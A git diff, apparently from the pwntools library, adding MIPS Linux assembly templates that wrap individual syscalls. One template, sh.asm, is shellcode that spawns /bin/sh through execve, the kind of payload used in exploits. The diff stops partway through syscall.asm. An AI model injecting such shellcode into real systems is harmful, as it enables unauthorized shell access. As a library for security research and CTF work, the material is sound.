a/pwnlib/shellcraft/templates/mips/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/mips/linux/recvmmsg.asm new file mode 100644 index 000000000..673b20eed --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/mips/linux/recvmsg.asm b/pwnlib/shellcraft/templates/mips/linux/recvmsg.asm new file mode 100644 index 000000000..4f0d8da52 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/mips/linux/remap_file_pages.asm new file mode 100644 index 000000000..192bf8c15 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/remap_file_pages.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/rename.asm b/pwnlib/shellcraft/templates/mips/linux/rename.asm new file mode 100644 index 000000000..79e1abd57 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/mips/linux/renameat.asm b/pwnlib/shellcraft/templates/mips/linux/renameat.asm new file mode 100644 index 000000000..e01bd0215 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/mips/linux/rmdir.asm b/pwnlib/shellcraft/templates/mips/linux/rmdir.asm new file mode 100644 index 000000000..8ea0cb902 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..0f4f67e48 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..37d2749f3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/mips/linux/sched_getaffinity.asm new file mode 100644 index 000000000..54b7f497e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/mips/linux/sched_getparam.asm new file mode 100644 index 000000000..044e3e8a8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/mips/linux/sched_getscheduler.asm new file mode 100644 index 000000000..148708151 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/mips/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..1030632cc --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/mips/linux/sched_setaffinity.asm new file mode 100644 index 000000000..d162025e0 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/mips/linux/sched_setparam.asm new file mode 100644 index 000000000..c522cd627 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/mips/linux/sched_setscheduler.asm new file mode 100644 index 000000000..e02e2c002 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sched_yield.asm b/pwnlib/shellcraft/templates/mips/linux/sched_yield.asm new file mode 100644 index 000000000..c743c9acf --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/mips/linux/select.asm b/pwnlib/shellcraft/templates/mips/linux/select.asm new file mode 100644 index 000000000..2df687a34 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/select.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sendfile.asm b/pwnlib/shellcraft/templates/mips/linux/sendfile.asm new file mode 100644 index 000000000..980303137 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sendfile64.asm b/pwnlib/shellcraft/templates/mips/linux/sendfile64.asm new file mode 100644 index 000000000..523e4d524 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setdomainname.asm b/pwnlib/shellcraft/templates/mips/linux/setdomainname.asm new file mode 100644 index 000000000..a73900b39 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setdomainname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setgid.asm b/pwnlib/shellcraft/templates/mips/linux/setgid.asm new file mode 100644 index 000000000..cd5beb7d0 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setgroups.asm b/pwnlib/shellcraft/templates/mips/linux/setgroups.asm new file mode 100644 index 000000000..78da7397f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sethostname.asm b/pwnlib/shellcraft/templates/mips/linux/sethostname.asm new file mode 100644 index 000000000..21237bde7 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setitimer.asm b/pwnlib/shellcraft/templates/mips/linux/setitimer.asm new file mode 100644 index 000000000..2cc643c48 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setpgid.asm b/pwnlib/shellcraft/templates/mips/linux/setpgid.asm new file mode 100644 index 000000000..4895e4905 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setpriority.asm b/pwnlib/shellcraft/templates/mips/linux/setpriority.asm new file mode 100644 index 000000000..fa1b80675 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setregid.asm b/pwnlib/shellcraft/templates/mips/linux/setregid.asm new file mode 100644 index 000000000..70628dac9 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setregid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="rgid, egid"/> +<%docstring> +Invokes the syscall setregid. See 'man 2 setregid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + + + ${syscall('SYS_setregid', rgid, egid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setresgid.asm b/pwnlib/shellcraft/templates/mips/linux/setresgid.asm new file mode 100644 index 000000000..d23f011ab --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setresuid.asm b/pwnlib/shellcraft/templates/mips/linux/setresuid.asm new file mode 100644 index 000000000..e7d6e71c4 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setreuid.asm b/pwnlib/shellcraft/templates/mips/linux/setreuid.asm new file mode 100644 index 000000000..0ea89bda1 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setreuid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="ruid, euid"/> +<%docstring> +Invokes the syscall setreuid. See 'man 2 setreuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + + + ${syscall('SYS_setreuid', ruid, euid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setrlimit.asm b/pwnlib/shellcraft/templates/mips/linux/setrlimit.asm new file mode 100644 index 000000000..727037e83 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setsid.asm b/pwnlib/shellcraft/templates/mips/linux/setsid.asm new file mode 100644 index 000000000..51067856d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/mips/linux/settimeofday.asm b/pwnlib/shellcraft/templates/mips/linux/settimeofday.asm new file mode 100644 index 000000000..49a6c993c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setuid.asm b/pwnlib/shellcraft/templates/mips/linux/setuid.asm new file mode 100644 index 000000000..642ca579c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sh.asm b/pwnlib/shellcraft/templates/mips/linux/sh.asm new file mode 100644 index 000000000..21da1293e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sh.asm @@ -0,0 +1,7 @@ +<% from pwnlib.shellcraft import mips %> +<%docstring>Execute /bin/sh + +${mips.pushstr('//bin/sh')} + +${mips.syscall('SYS_execve', '$sp', 0, 0)} + diff --git a/pwnlib/shellcraft/templates/mips/linux/sigaction.asm b/pwnlib/shellcraft/templates/mips/linux/sigaction.asm new file mode 100644 index 000000000..903dc991c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/mips/linux/sigaltstack.asm new file mode 100644 index 000000000..c8f112c1a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/mips/linux/signal.asm b/pwnlib/shellcraft/templates/mips/linux/signal.asm new file mode 100644 index 000000000..4eda4f8db --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sigpending.asm b/pwnlib/shellcraft/templates/mips/linux/sigpending.asm new file mode 100644 index 000000000..205d04326 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/mips/linux/sigprocmask.asm new file mode 100644 index 000000000..fa7462d9c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sigprocmask.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="how, set, oset"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + + + ${syscall('SYS_sigprocmask', how, set, oset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sigreturn.asm b/pwnlib/shellcraft/templates/mips/linux/sigreturn.asm index cf4d7afe5..18f93828d 100644 --- a/pwnlib/shellcraft/templates/mips/linux/sigreturn.asm +++ b/pwnlib/shellcraft/templates/mips/linux/sigreturn.asm @@ -1,5 +1,9 @@ + <% -from pwnlib.shellcraft.mips.linux import syscall + from pwnlib.shellcraft.mips.linux import syscall %> -<%docstring>Sigreturn system call - ${syscall('SYS_sigreturn', )} +<%docstring> +Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. + + + ${syscall('SYS_sigreturn')} diff --git a/pwnlib/shellcraft/templates/mips/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/mips/linux/sigsuspend.asm new file mode 100644 index 000000000..774384fca --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/mips/linux/splice.asm b/pwnlib/shellcraft/templates/mips/linux/splice.asm new file mode 100644 index 000000000..5762be0a9 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/stat.asm b/pwnlib/shellcraft/templates/mips/linux/stat.asm new file mode 100644 index 000000000..398f20cf5 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/stat64.asm b/pwnlib/shellcraft/templates/mips/linux/stat64.asm new file mode 100644 index 000000000..b097104d2 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/stime.asm b/pwnlib/shellcraft/templates/mips/linux/stime.asm new file mode 100644 index 000000000..c2d59af97 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/mips/linux/stty.asm b/pwnlib/shellcraft/templates/mips/linux/stty.asm new file mode 100644 index 000000000..07ae6de55 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/mips/linux/symlink.asm b/pwnlib/shellcraft/templates/mips/linux/symlink.asm new file mode 100644 index 000000000..b3308b823 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/mips/linux/symlinkat.asm b/pwnlib/shellcraft/templates/mips/linux/symlinkat.asm new file mode 100644 index 000000000..23871a731 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sync.asm b/pwnlib/shellcraft/templates/mips/linux/sync.asm new file mode 100644 index 000000000..5f2df67b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/mips/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/mips/linux/sync_file_range.asm new file mode 100644 index 000000000..d60bdbe5d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/syscall.asm b/pwnlib/shellcraft/templates/mips/linux/syscall.asm index 6ea99eff5..31cef1d1a 100644 --- a/pwnlib/shellcraft/templates/mips/linux/syscall.asm +++ b/pwnlib/shellcraft/templates/mips/linux/syscall.asm @@ -1,10 +1,9 @@ <% - from pwnlib.shellcraft import mips - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.shellcraft import mips, pretty + from pwnlib.constants import Constant + from pwnlib.abi import linux_mips_syscall as abi %> - - -<%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None, arg6 = None"/> +<%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4=None, arg5=None"/> <%docstring> Args: [syscall_number, \*args] Does a syscall @@ -13,29 +12,68 @@ Any of the arguments can be expressions to be evaluated by :func:`pwnlib.constan Example: - >>> print shellcraft.mips.linux.syscall(11, 1, 'sp', 2, 0).rstrip() - /* call syscall(11, 1, 'sp', 2, 0) */ - /* Set a0 = 1 = 0x1 */ 